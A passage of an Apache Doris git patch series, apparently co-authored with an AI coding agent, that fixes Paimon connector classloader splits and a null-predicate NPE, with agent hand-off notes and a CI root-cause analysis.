`-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `BUILD SUCCESS`/`MVN_EXIT`([[doris-build-verify-gotchas]])。 - **漏 `-am` → `could not resolve fe-connector-spi ${revision}` 假错**(FIX-3 fail-before 验证亲证)。改 SPI + **漏 `-am` → `could not resolve fe-connector-spi ${revision}` 假错**。改 fe-core `-pl :fe-core -am`;SPI `-pl :fe-connector-api`/`:fe-connector-spi -am`。**checkstyle**:连接器 - `mvn -f …/fe/pom.xml -pl :fe-connector-paimon -am checkstyle:check`。 + `mvn -f …/fe/pom.xml -pl :fe-connector-paimon -am checkstyle:check`。**checkstyle 在 `validate` phase 跑(编译前)**—— + 多行数组初始化 `{` 须留在 `=` 同行(见 FIX-4),否则 'array initialization lcurly' indentation 报错。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE 单测。harness:`RecordingConnectorContext`/`RecordingPaimonCatalogOps`/`FakePaimonTable` - (注意 `FakePaimonTable.copy` 是 no-op recorder,不能当 reset/merge 的 fail-before 闸——须 real - `FileSystemCatalog`,见 FIX-3 `resolveScanTableResetsStalePinForIncrementalRead`)/`PaimonScanPlanProviderTest` - (real-table `FileSystemCatalog`)/`PaimonIncrementalScanParamsTest`/`PaimonCatalogFactoryTest`[FIX-4]/ - `DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated(`enablePaimonTest` 默认 false)→ 注明 gated,勿谎称跑过。 +- 测试 harness:`PaimonCatalogFactoryTest`(纯 Map→Configuration/HiveConf,56 测)/`PaimonScanPlanProviderTest` + (real-table `FileSystemCatalog`)/`PaimonIncrementalScanParamsTest`/`RecordingConnectorContext`/ + `RecordingPaimonCatalogOps`/`FakePaimonTable`(`.copy` 是 no-op recorder,reset/merge fail-before 须 real + table)/`DefaultConnectorContextNormalizeUriTest`(fe-core)。live-e2e CI-gated(`enablePaimonTest` 默认 false)→ + 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **逐项修**:一次一个 fix,design→impl→test→commit,别批量糊。各 fix 根因/site/legacy 对照/test 都在 - [task-list-P5-rereview3-fixes.md](./task-list-P5-rereview3-fixes.md) + 各 `FIX-*-design.md`。 -- **design 前对抗 red-team 见效(FIX-1/FIX-3 亲证)**:5-skeptic 各驳一 claim + completeness critic 在写码前 - 抓出 signature-fanout(FIX-3:`resolveScanTable` 两 caller 共 chokepoint)、test-double 矛盾 - (`FakePaimonTable.copy` 是 no-op→fail-before 须 real table)、framing 纠偏(FIX-3 失败态实为硬抛非静默丢行)。 - **改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)。** -- **fail-before 闸要真验**:FIX-3 neuter 掉 fix 后跑 real-table 测确认 RED(`IllegalArgumentException`)再恢复 - (verification-before-completion;勿凭「应该会红」自满)。 -- **历史不压制新发现**:P9-1(FIX-1)正是被 DV-025「合理化 defer」却没真修的;P2-1(FIX-3)的 strip 也是被 - 「fresh table 无 inherited scan.*」错误合理化。 -- 完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`。 +- **B8 是大动作**:开工前 `AskUserQuestion` 定 scope(删哪个子树 / follow-ups 哪几条先做)。逐子树删 + 每批跑 + fe-core 编译 + 连接器测 + regression-gated;**保 load-bearing dispatch ordering**(grep 全调用方,base vs MVCC + 子类)。 +- **改 handle/分区/scan 流必 grep 全调用方 + 确认实际实例类(base vs MVCC 子类)**;改 storage/auth 装配流必 + grep `applyStorageConfig` 全 caller(filesystem/jdbc/hms/dlf)+ 注意 raw `hadoop.*`/`fs.*` passthrough 跑在最后 + (last-write-wins)会 clobber 之前的 authoritative 设置(FIX-4 4d/4e 亲证)。 +- **design red-team(写码前)+ impl verification(写码后)两道**本 session 各抓真 defect,**勿跳**。 +- **fail-before 闸要真验**:钉「旧 ordering 会 RED」的测试(username-priority / kerberos-survives-simple-HDFS)。 +- **历史不压制新发现**;完整背景:报告 `reviews/P5-paimon-rereview3-2026-06-12.md`;memory `catalog-spi-p5-*`。 diff --git a/plan-doc/task-list-P5-rereview3-fixes.md b/plan-doc/task-list-P5-rereview3-fixes.md index 57ceb612452856..bf80d7f8170639 100644 --- a/plan-doc/task-list-P5-rereview3-fixes.md +++ b/plan-doc/task-list-P5-rereview3-fixes.md @@ -107,7 +107,20 @@ incremental-between window is applied → potential wrong @incr scan. **Tests**: `PaimonIncrementalScanParamsTest` — assert the reset keys are present/applied for @incr. **Build**: connector only. **Commit**: `fix: FIX-INCR-SCAN-RESET`. -## ▶ FIX-4 — `FIX-FECONF-STORAGE-PARITY` (cluster: P8-1/P8-2/P8-3/P8-4/P9-2/P9-3) — FULL legacy parity +## ✅ FIX-4 — `FIX-FECONF-STORAGE-PARITY` (cluster: P8-1/P8-2/P8-3/P8-4/P9-2/P9-3) — **DONE** (commit `f0210b51871`) +> Single commit (the shared `applyS3aBaseConfig` helper couples 4a/4b/4c). Design red-team +> `wf_a6385c61-669` (pre-code) + impl verification `wf_f90260cb-5e6` (post-code, fidelity CLEAN). +> Design/summary: `FIX-FECONF-STORAGE-PARITY-design.md` + `-summary.md`. Verified: connector 56/0/0 + +> full module green; checkstyle 0; import-gate clean. Live e2e CI-gated. +> **Done beyond the literal task-list (all justified by signed FULL parity / found in review)**: +> (i) **user-approved** S3 endpoint-from-region (`https://s3..amazonaws.com`, same defect class as the +> OSS P8-1 fix); (ii) per-backend tuning defaults — S3 `50/3000/1000` (red-team caught a single shared default +> would mis-tune AWS S3), OSS/COS/OBS `100/10000/10000`; (iii) COS/OBS detection by endpoint PATTERN +> (`myqcloud.com`/`myhuaweicloud.com`) not scheme-key-only; (iv) unconditional `fs.cosn.*`/`fs.obs.*`; +> (v) **4e folded-in pre-existing MAJOR** — kerberos block moved AFTER the storage overlay so a kerberized-HMS + +> simple-HDFS catalog isn't clobbered to `auth=simple`+`sasl=true` (user-approved fold-in). Removed the dead +> DLF-local OSS-endpoint block (derivation now shared). **Known residual (out of scope, documented)**: OSS +> endpoint-PATTERN detection not added to the existing OSS block (pre-existing, no failing case). **Root cause (shared)**: `PaimonCatalogFactory.buildHadoopConfiguration:390-394` rebuilds the FE-side Hadoop `Configuration` from RAW props (the connector cannot import fe-core `OSSProperties`/`COSProperties`/ `OBSProperties`/`HMSBaseProperties`), and the reconstruction (`applyStorageConfig:412-426`, From fe208a86c9599d846b01994707261cdd09301c39 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 22:17:22 +0800 Subject: [PATCH 044/128] =?UTF-8?q?fix:=20FIX-PAIMON-HADOOP-CLASSLOADER=20?= =?UTF-8?q?=E2=80=94=20Paimon=20plugin=20self-contained=20Hadoop=20FS=20cl?= =?UTF-8?q?osure?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the Paimon connector plugin runs under a child-first ClassLoader with org.apache.hadoop NOT parent-first, and bundled hadoop-common/hadoop-client-api but NOT hadoop-aws. So FileSystem/SecurityUtil loaded child-first while S3AFileSystem resolved from the parent 'app' loader -> cross-loader ClassCastException ('S3AFileSystem cannot be cast to FileSystem') and a permanent SecurityUtil. poison ('Could not initialize class ...SecurityUtil', 'DNSDomainNameResolver not DomainNameResolver', 'ServiceConfigurationError: NullScanFileSystem not a subtype'), cascading to 'Unknown database X'. ~39 of 42 external-regression suites failed on the af2037 TeamCity run; not fixed by any later commit. Solution (self-contained plugin — aligns with fe-core dropping hadoop/hive-catalog-shade after full connector migration; does NOT lean on the parent): - pom: add hadoop-aws (the only missing FS impl, S3AFileSystem; DistributedFileSystem already comes from the transitive hadoop-client-api). hive-common stays bundled. - PaimonCatalogFactory.buildHadoopConfiguration: conf.setClassLoader(plugin loader) so Configuration.getClass("fs..impl") resolves the FS impl from the plugin loader. - PaimonConnector.createCatalogFromContext (single chokepoint for all flavors): pin the thread-context classloader to the plugin loader around catalog creation so the FileSystem ServiceLoader and SecurityUtil static init resolve from the child. Mirrors JdbcConnectorClient / ThriftHmsClient. Tests: connector build SUCCESS + all connector UTs 0 fail/0 error; plugin lib/ now contains hadoop-aws/S3AFileSystem; checkstyle + connector import-gate clean. The full runtime proof is the docker external paimon suite (CI-gated, enablePaimonTest) — not run locally. See plan-doc/FIX-PAIMON-HADOOP-CLASSLOADER-{design,summary}.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 18 +++ .../paimon/PaimonCatalogFactory.java | 7 ++ .../connector/paimon/PaimonConnector.java | 12 ++ .../FIX-PAIMON-HADOOP-CLASSLOADER-design.md | 111 ++++++++++++++++++ .../FIX-PAIMON-HADOOP-CLASSLOADER-summary.md | 35 ++++++ plan-doc/task-list-ci-external-2026-06-12.md | 65 ++++++++++ 6 files changed, 248 insertions(+) create mode 100644 plan-doc/FIX-PAIMON-HADOOP-CLASSLOADER-design.md create mode 100644 plan-doc/FIX-PAIMON-HADOOP-CLASSLOADER-summary.md create mode 100644 plan-doc/task-list-ci-external-2026-06-12.md diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index d6aafb0615cb6e..2663dcf4446549 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -94,6 +94,24 @@ under the License. hadoop-common + + + org.apache.hadoop + hadoop-aws + + + org.apache.doris:fe-thrift + org.apache.thrift:libthrift org.apache.logging.log4j:* org.slf4j:* diff --git a/fe/fe-connector/fe-connector-paimon/src/main/assembly/plugin-zip.xml b/fe/fe-connector/fe-connector-paimon/src/main/assembly/plugin-zip.xml index 0d29baa55b34bf..9927cb0882454c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/assembly/plugin-zip.xml +++ b/fe/fe-connector/fe-connector-paimon/src/main/assembly/plugin-zip.xml @@ -46,6 +46,12 @@ under the License. org.apache.doris:fe-connector-spi org.apache.doris:fe-extension-spi org.apache.doris:fe-filesystem-api + + org.apache.doris:fe-thrift + org.apache.thrift:libthrift org.apache.logging.log4j:* org.slf4j:* diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 589554532ea591..14981da25cb57d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -1050,7 +1050,10 @@ static String encodeSchemaEvolution(long currentSchemaId, List history) try { byte[] bytes = new TSerializer(new TBinaryProtocol.Factory()).serialize(carrier); return BASE64_ENCODER.encodeToString(bytes); - } catch (Exception e) { + } catch (Exception | LinkageError e) { + // Catch LinkageError (e.g. IncompatibleClassChangeError from a thrift classloader split) too: + // wrapped as a RuntimeException it surfaces as a clean per-query failure instead of escaping + // the connection handler as an uncaught Error and killing the whole mysql session. throw new RuntimeException("Failed to serialize paimon schema-evolution info", e); } } From 0c564fa6710348244dd3295a8fee334dc00e5a6f Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 06:05:58 +0800 Subject: [PATCH 049/128] =?UTF-8?q?fix:=20FIX-PAIMON-JNI-PREDICATE-NULL=20?= =?UTF-8?q?=E2=80=94=20RC-2=20encodedStr-null=20NPE=20on=20no-filter=20sca?= =?UTF-8?q?ns=20(CI=20968828)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: on the SPI plugin scan path, PaimonScanPlanProvider.getScanNodeProperties emitted the paimon.predicate property only when filter.isPresent() && !predicates.isEmpty(), and populateScanLevelParams set the thrift field only when non-null. So a paimon read with no pushed-down filter (e.g. force_jni_scanner=true `select *`) omitted paimon_predicate entirely; BE then omitted the JNI key, and PaimonJniScanner.getPredicates() called PaimonUtils.deserialize(null) -> NPE "encodedStr is null". Legacy PaimonScanNode.createScanRangeLocations always serialized the (possibly empty) predicate list, so the field was always present. Caused test_paimon_catalog_varbinary, paimon_tb_mix_format, paimon_partition_legacy, paimon_timestamp_types, test_paimon_partition_table. Solution: - getScanNodeProperties always serializes the predicate list (empty list -> non-null base64 string) and emits paimon.predicate unconditionally, restoring the legacy invariant. - BE backstop: PaimonJniScanner.getPredicates() treats a null paimon_predicate param as "no filter" (returns emptyList) so the JNI reader never NPEs on a missing param. Tests: PaimonScanPlanProviderTest.getScanNodePropertiesAlwaysEmitsPredicateForNoFilterScan pins that a no-filter scan emits paimon.predicate and it deserializes to an empty list. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../apache/doris/paimon/PaimonJniScanner.java | 7 +++ .../paimon/PaimonScanPlanProvider.java | 14 +++--- .../paimon/PaimonScanPlanProviderTest.java | 44 +++++++++++++++++++ 3 files changed, 59 insertions(+), 6 deletions(-) diff --git a/fe/be-java-extensions/paimon-scanner/src/main/java/org/apache/doris/paimon/PaimonJniScanner.java b/fe/be-java-extensions/paimon-scanner/src/main/java/org/apache/doris/paimon/PaimonJniScanner.java index b40ff54fbd829c..7ae509152a4be3 100644 --- a/fe/be-java-extensions/paimon-scanner/src/main/java/org/apache/doris/paimon/PaimonJniScanner.java +++ b/fe/be-java-extensions/paimon-scanner/src/main/java/org/apache/doris/paimon/PaimonJniScanner.java @@ -37,6 +37,7 @@ import java.io.IOException; import java.util.Arrays; +import java.util.Collections; import java.util.List; import java.util.Map; import java.util.TimeZone; @@ -134,6 +135,12 @@ private int[] getProjected() { } private List getPredicates() { + // Backstop for a missing paimon_predicate param (scan with no pushed-down filter): a null here means + // "no filter", not an error. Guard the unconditional deserialize so the JNI reader never NPEs on + // deserialize(null) ("encodedStr is null"). The FE producer also always emits an (empty) predicate now. + if (paimonPredicate == null) { + return Collections.emptyList(); + } List predicates = PaimonUtils.deserialize(paimonPredicate); if (LOG.isDebugEnabled()) { LOG.debug("predicates:{}", predicates); diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 14981da25cb57d..dc8e7e1586285a 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -528,16 +528,18 @@ public Map getScanNodeProperties( String serializedTable = encodeObjectToString(table); props.put("paimon.serialized_table", serializedTable); - // Serialized predicates for BE's JNI scanner + // Serialized predicates for BE's JNI scanner. ALWAYS emit, even for the no-filter / empty-predicate + // case: an empty list still serializes to a non-null base64 string, and PaimonJniScanner.getPredicates() + // deserializes this param UNCONDITIONALLY — omitting it makes the JNI reader NPE on deserialize(null) + // ("encodedStr is null"). Mirrors legacy PaimonScanNode.createScanRangeLocations, which always called + // setPaimonPredicate(encodeObjectToString(predicates)) regardless of whether predicates was empty. + List predicates = Collections.emptyList(); if (filter.isPresent()) { RowType rowType = table.rowType(); PaimonPredicateConverter converter = new PaimonPredicateConverter(rowType); - List predicates = converter.convert(filter.get()); - if (!predicates.isEmpty()) { - String serializedPredicate = encodeObjectToString(predicates); - props.put("paimon.predicate", serializedPredicate); - } + predicates = converter.convert(filter.get()); } + props.put("paimon.predicate", encodeObjectToString(predicates)); // Paimon JDBC metastore options for BE (if applicable) Map backendOptions = getBackendPaimonOptions(); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 0907365dd94077..b316c06540f2ef 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -460,6 +460,50 @@ public void resolveScanTableResetsStalePinForIncrementalRead(@TempDir Path wareh } } + @Test + public void getScanNodePropertiesAlwaysEmitsPredicateForNoFilterScan(@TempDir Path warehouse) + throws Exception { + // RC-2 (CI 968828): a paimon scan with NO pushed-down filter must STILL emit the paimon.predicate + // param. PaimonJniScanner.getPredicates() deserializes it UNCONDITIONALLY, so when the key is + // absent the JNI reader NPEs ("encodedStr is null") on every no-WHERE force_jni read. Legacy + // PaimonScanNode.createScanRangeLocations always serialized the (possibly empty) predicate list. + // MUTATION: re-gating props.put("paimon.predicate", ...) on filter.isPresent() && !isEmpty (the + // pre-fix behavior) -> the key is absent for a no-filter scan -> red. + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("val", DataTypes.BIGINT()) + .primaryKey("id") + .option("bucket", "1") + .build(), false); + Table base = catalog.getTable(id); + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(base); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Map props = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + String encoded = props.get("paimon.predicate"); + Assertions.assertNotNull(encoded, + "a no-filter scan must still emit paimon.predicate (else the BE JNI reader NPEs on " + + "deserialize(null) -> 'encodedStr is null')"); + // Round-trips (same Base64 + paimon InstantiationUtil the BE PaimonUtils.deserialize uses) to + // an EMPTY predicate list, so ReadBuilder.withFilter(emptyList) applies no filter. + byte[] decoded = Base64.getDecoder().decode(encoded.getBytes(StandardCharsets.UTF_8)); + Object obj = InstantiationUtil.deserializeObject(decoded, getClass().getClassLoader()); + Assertions.assertTrue(obj instanceof List, "paimon.predicate must deserialize to a List"); + Assertions.assertTrue(((List) obj).isEmpty(), + "a no-filter scan's predicate list must deserialize to empty (no filter applied)"); + } + } + @Test public void resolveTableUsesTransientWithoutReload() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); From 13fba3698107d701173df334134bd5cff4198fad Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 06:06:24 +0800 Subject: [PATCH 050/128] docs: RCA + task-list for CI build 968828 (paimon external regression) 8-family root-cause analysis (adversarially verified) of the 37 external-regression failures. 7 in-scope paimon-SPI regressions + 2 out-of-scope (hive CTAS stale test; BE shutdown ASAN race). RC-1/2/6/7 fixed (contained); RC-3/4/5 deferred to the docker-gated self-contained-classloader batch. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../P5-paimon-ci-968828-rca-2026-06-13.md | 154 ++++++++++++++++++ plan-doc/task-list-P5-ci-968828-fixes.md | 22 +++ 2 files changed, 176 insertions(+) create mode 100644 plan-doc/reviews/P5-paimon-ci-968828-rca-2026-06-13.md create mode 100644 plan-doc/task-list-P5-ci-968828-fixes.md diff --git a/plan-doc/reviews/P5-paimon-ci-968828-rca-2026-06-13.md b/plan-doc/reviews/P5-paimon-ci-968828-rca-2026-06-13.md new file mode 100644 index 00000000000000..932c14debd0ef2 --- /dev/null +++ b/plan-doc/reviews/P5-paimon-ci-968828-rca-2026-06-13.md @@ -0,0 +1,154 @@ +# CI RCA — TeamCity External Regression build 968828 (commit f7114a2836e) + +Date: 2026-06-13 · Branch: catalog-spi-07-paimon · 37 failed tests · No code changed yet (review gate). + +Method: evidence from the collected log bundle (`/mnt/disk1/yy/tmp/64445_..._external/`) + +source tracing in the repo + an 8-family parallel RCA workflow (16 agents, each finding +adversarially verified). This doc is the review artifact; fixes await sign-off. + +## Headline + +This is **NOT** the prior `af2037` classloader bug recurring as-is. It is **7 distinct +paimon-SPI-migration regressions** (4 of them new plugin-classloader / packaging splits — partly +caused by the *prior* fix `09435658950` only covering S3) plus **2 out-of-scope items**. +The current commit already contains both round-3 fixes; they did not regress, but they were +incomplete and exposed new splits. + +Timeline (verified): single FE+BE ran 00:52→01:55; **all 37 failures occurred 01:22–01:46:32**; +BE shut down 01:55:30 and **segfaulted on teardown 01:56:18**; cluster restarted 02:00:37. +The cluster bounce is *after* every failure and is not their cause. + +## Root causes (consolidated) — 7 in-scope, 2 out-of-scope + +| RC | Root cause | Sev | ~Tests | Fix (recommended) | Decision? | +|----|-----------|-----|------|------|-----------| +| **RC-1** | **Thrift libthrift classloader split** | BLOCKER | ~19 | exclude libthrift+fe-thrift from plugin-zip (paimon+hudi) | no | +| **RC-2** | **Paimon predicate not serialized for no-filter JNI scans** | BLOCKER | 5 | always serialize (possibly empty) predicate list | no | +| **RC-3** | **S3A AWS-SDK static-init collision** | BLOCKER | 4 | bundle AWS SDK into plugin (self-contained) | **YES** | +| **RC-4** | **OSS JindoOssFileSystem classloader split** | BLOCKER | 2 | bundle `com.aliyun.jindodata:jindo-sdk` child-first | no | +| **RC-5** | **HMS metastore-client reflection split** | BLOCKER | 1 | self-contained HMS client closure **or** parent-first hive | **YES** | +| **RC-6** | **DESC `Key` parity (isKey=true)** | MAJOR | 3 | mapFields ConnectorColumn isKey=true | no | +| **RC-7** | **Sys-table `$snapshots`/`$manifests` schema-cache** | MAJOR | 3 | override `getSchemaCacheValue` in PluginDrivenSysExternalTable | no | +| RC-8 | hive CTAS strict-mode (stale test expectation, not paimon) | — | 1 | out of scope — flag to hive/auto-partition owner | no | +| RC-9 | BE shutdown segfault (pre-existing ASAN teardown race) | — | 0 | out of scope — flag as CI-infra | no | + +### RC-1 — Thrift libthrift classloader split (BLOCKER, dominant) +`PaimonScanPlanProvider.encodeSchemaEvolution()` (`PaimonScanPlanProvider.java:1051`) calls +`new TSerializer(new TBinaryProtocol.Factory()).serialize(carrier)` where `carrier` is +`org.apache.doris.thrift.TFileScanRangeParams`. The paimon plugin-zip **bundles** `libthrift-0.16.0` +and loads `org.apache.thrift.*` **child-first** (not in `CONNECTOR_PARENT_FIRST_PREFIXES`), while +`fe-thrift` is `provided` so `TFileScanRangeParams` resolves **parent-first** and implements the +**parent's** `TBase`. Child `TSerializer` + parent `TBase` ⇒ `IncompatibleClassChangeError`. +That's an **`Error`**, not caught by `encodeSchemaEvolution`'s `catch (Exception)` (line 1053), so it +escapes to the connection handler (`ReadListener` catch(Throwable)) which kills the mysql channel. +- Only on the native path: `buildSchemaEvolutionParam` is gated `!isForceJni && !forceJniScanner` + (`PaimonScanPlanProvider.java:592`), so `force_jni_scanner=false` scans + ANALYZE hit it. +- Affects: C (2 ANALYZE), most of family D (connection-killed), G(predict, catalog_timestamp_tz, sql_block_rule). +- Evidence: `fe.log:82728+` (31×), `be-java-extensions` plugin zip contains `lib/libthrift-0.16.0.jar`; + es/jdbc/maxcompute/hive assemblies all already exclude libthrift+fe-thrift; paimon+hudi do not. +- **Fix:** add to `fe-connector-paimon/src/main/assembly/plugin-zip.xml` (and hudi's): + `org.apache.doris:fe-thrift` + `org.apache.thrift:libthrift`. + Defense-in-depth: broaden `encodeSchemaEvolution` catch to `Throwable` (or `Exception | LinkageError`) + so a future linkage error is a clean query failure, not a connection kill. + +### RC-2 — Predicate not serialized for no-filter JNI scans (BLOCKER, independent of RC-1) +`getScanNodeProperties` emits `paimon.predicate` only when `filter.isPresent() && !predicates.isEmpty()` +(`PaimonScanPlanProvider.java:531-540`); `populateScanLevelParams` sets the thrift field only `if +(predicate != null)` (`:975-978`). BE then omits the JNI key (`paimon_jni_reader.cpp:55-60`), and +`PaimonJniScanner.getPredicates()` calls `PaimonUtils.deserialize(null)` → NPE "encodedStr is null". +Legacy `PaimonScanNode.createScanRangeLocations()` (`:211-212`) **always** serialized the predicate +list (empty list → non-null base64), so the field was always present. +- These 5 tests set `force_jni_scanner=true`, so they **bypass RC-1** (line 592) and hit this. Confirmed + the BE stack is at `getPredicates` (predicate), not `getSplit` — RC-2 is a separate root from RC-1. +- **Fix:** in `getScanNodeProperties`, always `props.put("paimon.predicate", encodeObjectToString(predicates))` + with `predicates = emptyList` when no filter (restores legacy invariant). Optional backstop: null-guard + in `getPredicates()` → return `Collections.emptyList()`. + +### RC-3 — S3A `S3AInternalAuditConstants` static-init collision (BLOCKER) — DECISION +Prior fix `09435658950` bundled `hadoop-aws` into the plugin → a **second** child-first copy of +`S3AInternalAuditConstants`/`AuditSpanS3A`. But the AWS SDK (`software.amazon.awssdk`) is **excluded** +from the plugin, so it resolves from the single **parent** copy. Both S3A copies' `` build +`new ExecutionAttribute("...AuditSpanS3A")` against the SDK's process-wide `ensureUnique()` static; the +2nd registration throws → `ExceptionInInitializerError` → `S3AInternalAuditConstants` is permanently +un-initializable for the whole FE JVM (subsequent: "Could not initialize class"). Poisons **iceberg + +paimon** (the shared parent copy). Inverse of `af2037` (then: plugin *missing* hadoop-aws; now: plugin +*duplicates* hadoop-aws and collides on the non-bundled shared SDK static). +- Evidence: single hash pair `f81e433`/`6959a100` in all 12 occurrences (= exactly two Class copies); + first hit iceberg createTable 01:34:40; paimon S3A inited first 01:22:28 (1000 ms timeout) vs + iceberg/fe-core 10000 ms; MBean "Instance already exists" `fe.log:267803`. +- **Decision (direction):** + - **B (self-contained, intent-aligned):** also bundle the AWS SDK S3 modules into the plugin + (child-first) so the plugin's S3A registers against the plugin's *own* SDK static. Heavier + (large SDK), matches the stated "fe-core sheds hadoop later" end-state. + - A (parent-first, one-liner): add `org.apache.hadoop.` to `CONNECTOR_PARENT_FIRST_PREFIXES`. This is + the approach previously **rejected** by the user; emergency-mitigation only. + +### RC-4 — OSS `JindoOssFileSystem` classloader split (BLOCKER) +For an `oss://` warehouse the connector sets `fs.oss.impl=com.aliyun.jindodata.oss.JindoOssFileSystem` +(`PaimonCatalogFactory.java:604`, == legacy value, not a value bug). That impl is **not bundled** in the +plugin (prior fix covered S3 only), so it loads from the **parent** and "cannot be cast to" the +child-loaded `org.apache.hadoop.fs.FileSystem`. Swallowed at `ExternalCatalog.java:914` → "Unknown +database db1" on first listing. +- Verifier correction: do **not** add `paimon-jindo` (only carries `org.apache.paimon.jindo.*`; its + jindo-core/jindo-sdk are `provided`/non-transitive). Add **`com.aliyun.jindodata:jindo-sdk`** so the + plugin bundles `JindoOssFileSystem` child-first (exactly like hadoop-aws carries `S3AFileSystem`). + Verify by unzipping the rebuilt plugin zip for `com/aliyun/jindodata/oss/JindoOssFileSystem.class`. +- OBS (`obs://`) is the same latent split (no native loader) — would need `hadoop-huaweicloud`; not + reached by these tests, fix opportunistically. + +### RC-5 — HMS metastore-client reflection split (BLOCKER) — DECISION +paimon-hive-connector's `RetryingMetaStoreClientFactory` does `Class.getMethod("getProxy", +childConfigurationClass, …)`, but `RetryingMetaStoreClient` resolves from the **parent** +`hive-catalog-shade-3.1.1` whose `getProxy` overloads use the **parent's** Configuration/HiveConf +Class objects → exact-identity mismatch → all 8 probes `NoSuchMethodException` → "Failed to create the +desired metastore client". Metastore is reachable (legacy path connects to `:9083` fine). +- **Decision (direction, both non-trivial):** + - parent-first: add `org.apache.hadoop.hive.` (+ Configuration) to parent-first so connector HiveConf + + client resolve from the single parent shade (simplest, but rejected direction). + - self-contained: bundle a clean version-matched HMS client closure child-first (real design work; + must avoid the unrelocated fastutil clash — the documented reason plain `hive-common` was used). + - **MUST validate with `enablePaimonTest=true` docker suite** (`PaimonConnector.java:148-163` already + flags this as a cutover blocker needing live-e2e; build-only verification is what let it slip). + +### RC-6 — DESC `Key` parity (MAJOR) +`PaimonConnectorMetadata.mapFields` (`:1062-1067`) builds `ConnectorColumn` via the 5-arg ctor → +`isKey` defaults false (`ConnectorColumn.java:38`); `ConnectorColumnConverter:67` propagates it, so DESC +shows `Key=false` for every paimon column vs `.out` expecting `true`. Legacy always set Column +`isKey=true`. +- **Fix:** use the 6-arg `ConnectorColumn(..., isKey=true)` ctor in `mapFields` — single chokepoint + (`buildTableSchema`/`mapFields`) covers latest + at-snapshot + system-table schema paths. + +### RC-7 — Sys-table schema-cache (MAJOR) +`PluginDrivenSysExternalTable` does not override `getSchemaCacheValue()`, so it inherits +`ExternalTable.getSchemaCacheValue()` → `ExternalCatalog.getSchema(key)` which re-looks-up the table by +name in the db map; virtual `$snapshots`/`$manifests` are never registered → CacheException "failed to +load schema cache value". Independent of auth (privileged time-travel `$snapshots` fails identically; +auth test just binds before the permission check). Legacy `PaimonSysExternalTable` overrode it to +compute on the transient object. +- **Fix:** override `getSchemaCacheValue()` in `PluginDrivenSysExternalTable` to compute via + `this.initSchema()` (activates the existing `resolveConnectorTableHandle` override). + +### RC-8 — hive CTAS (OUT OF SCOPE) +`test_hive_ctas_to_doris:77` is `assertTrue(false)` expecting a strict-mode throw; CTAS now succeeds +because auto-partition name-length handling changed (`f072dd961bd`). Hive→Doris internal, no paimon. +Stale test expectation — flag to hive/auto-partition owner; do not touch on this branch. + +### RC-9 — BE shutdown segfault (OUT OF SCOPE) +Generic upstream ASAN graceful-teardown race (brpc/bthread workers not joined before static dtors free +shared globals), only triggered because CI `be.conf` sets `enable_graceful_exit_check=true` (prod +default false → `_exit(0)`, no dtors). `doris_main.cpp`/`daemon.cpp`/BE paimon readers byte-identical to +master; no new paimon/SPI BE global. 